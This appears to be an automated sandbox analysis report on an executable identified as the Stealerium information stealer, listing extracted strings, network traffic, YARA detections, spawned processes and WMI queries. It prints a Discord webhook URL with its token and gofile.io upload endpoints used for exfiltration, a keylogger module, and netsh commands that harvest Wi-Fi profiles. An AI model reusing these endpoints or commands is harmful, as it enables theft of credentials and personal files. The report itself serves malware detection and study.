Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/runtime
Source: build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/runtime8
Source: build (2).exe	String found in binary or memory: https://github.com/kgnfth
Source: build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mono/linker/issues/1416.
Source: build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/rGINJH
Source: build (2).exe, 00000000.00000002.526618705.0000000002820000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/rGINJH)
Source: build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/rGINJH8
Source: build (2).exe, 00000000.00000003.395329735.000000000532B000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.394587117.000000000530A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://java.sun.com
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.525847639.00000000025CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: build (2).exe, 00000000.00000003.494909273.0000000005217000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.470455035.0000000005216000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.496284393.000000000521F000.00000004.00000800.00020000.00000000.sdmp, tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: build (2).exe, 00000000.00000003.494909273.0000000005217000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.470455035.0000000005216000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.496284393.000000000521F000.00000004.00000800.00020000.00000000.sdmp, tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store2.gofile.io
Source: build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store2.gofile.io/
Source: build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store2.gofile.io/uploadFile
Source: build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store2.gofile.io4
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: build (2).exe, 00000000.00000003.494909273.0000000005217000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.470455035.0000000005216000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.496284393.000000000521F000.00000004.00000800.00020000.00000000.sdmp, tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: global traffic	HTTP traffic detected: GET /api/webhooks/988697412963016724/CAsg4XwfA4jFKgysuPonwOGeXucLs801yCDVr8Wllkm5eEvJRRHZgq09CglFP4ccIwK3 HTTP/1.1Host: canary.discord.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getServer HTTP/1.1Host: apiv2.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.80.29.83:443 -> 192.168.2.4:49806 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: build (2).exe, Stealerium/Modules/Keylogger/Keylogger.cs	.Net Code: SetHook
Source: build (2).exe, Stealerium/Modules/Keylogger/Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.build (2).exe.130000.0.unpack, Stealerium/Modules/Keylogger/Keylogger.cs	.Net Code: SetHook
Source: 0.2.build (2).exe.130000.0.unpack, Stealerium/Modules/Keylogger/Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.0.build (2).exe.130000.0.unpack, Stealerium/Modules/Keylogger/Keylogger.cs	.Net Code: SetHook
Source: 0.0.build (2).exe.130000.0.unpack, Stealerium/Modules/Keylogger/Keylogger.cs	.Net Code: KeyboardLayout

Source: C:\Users\user\Desktop\build (2).exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\build (2).exe	File deleted: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL.pdf	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File deleted: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL.pdf	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File deleted: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\IPKGELNTQY.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File deleted: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\IPKGELNTQY.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File deleted: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\IPKGELNTQY.jpg	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: build (2).exe, type: SAMPLE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: build (2).exe, type: SAMPLE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.0.build (2).exe.130000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.0.build (2).exe.130000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.build (2).exe.130000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.build (2).exe.130000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: build (2).exe PID: 3704, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Source: build (2).exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: build (2).exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: build (2).exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.0.build (2).exe.130000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.0.build (2).exe.130000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.build (2).exe.130000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.build (2).exe.130000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: build (2).exe PID: 3704, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A6B010	0_2_00A6B010
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A68418	0_2_00A68418
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A6C516	0_2_00A6C516
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A657D8	0_2_00A657D8
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A64740	0_2_00A64740
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A638E8	0_2_00A638E8
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A66D84	0_2_00A66D84
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A6D560	0_2_00A6D560
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A64750	0_2_00A64750
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_00A638D7	0_2_00A638D7
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_04B18780	0_2_04B18780
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_04B1A7D8	0_2_04B1A7D8
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_04B18770	0_2_04B18770
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_04B192B8	0_2_04B192B8
Source: C:\Users\user\Desktop\build (2).exe	Code function: 0_2_04B192C8	0_2_04B192C8

Source: build (2).exe	Binary or memory string: OriginalFilename vs build (2).exe
Source: build (2).exe, 00000000.00000002.531081210.0000000005050000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDotNetZip.dll@ vs build (2).exe
Source: build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs build (2).exe
Source: build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs build (2).exe
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs build (2).exe
Source: build (2).exe, 00000000.00000002.532194968.0000000005412000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs build (2).exe
Source: build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs build (2).exe
Source: build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs build (2).exe
Source: build (2).exe, 00000000.00000002.530316264.0000000003799000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDotNetZip.dll@ vs build (2).exe
Source: build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs build (2).exe
Source: build (2).exe, 00000000.00000002.534235386.0000000006538000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs build (2).exe
Source: build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs build (2).exe
Source: build (2).exe	Binary or memory string: OriginalFilenamestub.exe6 vs build (2).exe

Source: C:\Windows\System32\msiexec.exe

Section loaded: sfc.dll

Jump to behavior

Source: build (2).exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: build (2).exe	Virustotal: Detection: 61%
Source: build (2).exe	ReversingLabs: Detection: 62%

Source: C:\Users\user\Desktop\build (2).exe

File read: C:\Users\user\Desktop\build (2).exe

Jump to behavior

Source: build (2).exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\build (2).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\build (2).exe "C:\Users\user\Desktop\build (2).exe"
Source: C:\Users\user\Desktop\build (2).exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\Desktop\build (2).exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\build (2).exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
